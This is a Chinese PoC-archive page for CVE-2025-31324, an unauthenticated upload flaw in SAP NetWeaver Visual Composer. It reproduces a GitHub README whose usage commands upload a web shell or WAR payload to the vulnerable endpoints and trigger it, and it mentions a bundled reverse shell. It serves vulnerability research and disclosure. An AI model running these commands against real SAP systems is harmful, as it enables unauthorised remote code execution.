POC详情: e57f2999fc79ed9b8ee51090fe66d1ed66a9c607

来源
https://github.com/abrewer251/CVE-2025-31324_PoC_SAP
关联漏洞
标题: SAP NetWeaver Visual Composer Metadata Uploader 代码问题漏洞 (CVE-2025-31324)
描述:SAP NetWeaver Visual Composer Metadata Uploader是德国思爱普(SAP)公司的一个用于辅助建模的工具。 SAP NetWeaver Visual Composer Metadata Uploader存在代码问题漏洞,该漏洞源于授权不当,可能导致上传恶意可执行文件。
描述
Proof-of-Concept for CVE-2025-31324: Unauthenticated upload in SAP NetWeaver Visual Composer Metadata Uploader
介绍
# CVE-2025-31324_PoC
Proof-of-Concept for CVE-2025-31324: Unauthenticated upload in SAP NetWeaver Visual Composer Metadata Uploader


This script performs:
  1. File upload to the vulnerable endpoint (via Upload host/port)
  2. Optional trigger via HTTP GET (via Trigger host/port)
  3. Basic response validation/logging

Usage example:
  python3 PoC.py \
    --host sap.example.com --port 50000 \
    --endpoint /irj/portal/sap/bc/webdynpro/sap/ZWDC_METADATA_UPLDR \
    --file EvilPayload.war \
    --trigger-path /irj/portal/irj/servlet_jsp/irj/root/EvilPayload/shell.jsp \
    --trigger-host sap.example.com --trigger-port 50001 --trigger-https true \
    --bypass-portal

  python3 PoC.py --host sap.example.com --port 50000 \
    --endpoint /developmentserver/metadatauploader \
    --file shell.jsp \
    --trigger-path /visual_composer/shell.jsp \
    --trigger-host sap.example.com --trigger-port 50001 --trigger-https

You also have the ability to upload a .war file if that is how you would like to execute. cache.jsp is a reverse shell that will give you aceess once inside the system. (Still working out issues there)

# Disclaimer
This is intended for educational purposes only and should not be used for any malicious activities. Always ensure you have the necessary permissions and follow ethical guidelines when testing or researching security vulnerabilities.

For any questions or clarifications, please feel free to reach out. Stay safe and secure!
文件快照

 [4.0K]  /data/pocs/e57f2999fc79ed9b8ee51090fe66d1ed66a9c607
├── [ 399]  cache.jsp
├── [ 856]  checkForEndpoints.sh
├── [4.0K]  EvilPayload
│   ├── [  86]  metadata.xml
│   ├── [4.0K]  META-INF
│   │   └── [  59]  MANIFEST.MF
│   ├── [4.0K]  pages
│   │   └── [ 399]  shell.jsp
│   └── [4.0K]  WEB-INF
│       └── [ 430]  web.xml
├── [1.0K]  LICENSE
├── [4.8K]  PoC.py
├── [1.4K]  README.md
└── [ 963]  scan_visual_composer.sh

4 directories, 10 files
神龙机器人已为您缓存
备注
    1. 建议优先通过来源进行访问。
    2. 如果因为来源失效或无法访问,请发送邮箱到 f.jinxu#gmail.com 索取本地快照(把 # 换成 @)。
    3. 神龙已为您对POC代码进行快照,为了长期维护,请考虑为本地POC付费,感谢您的支持。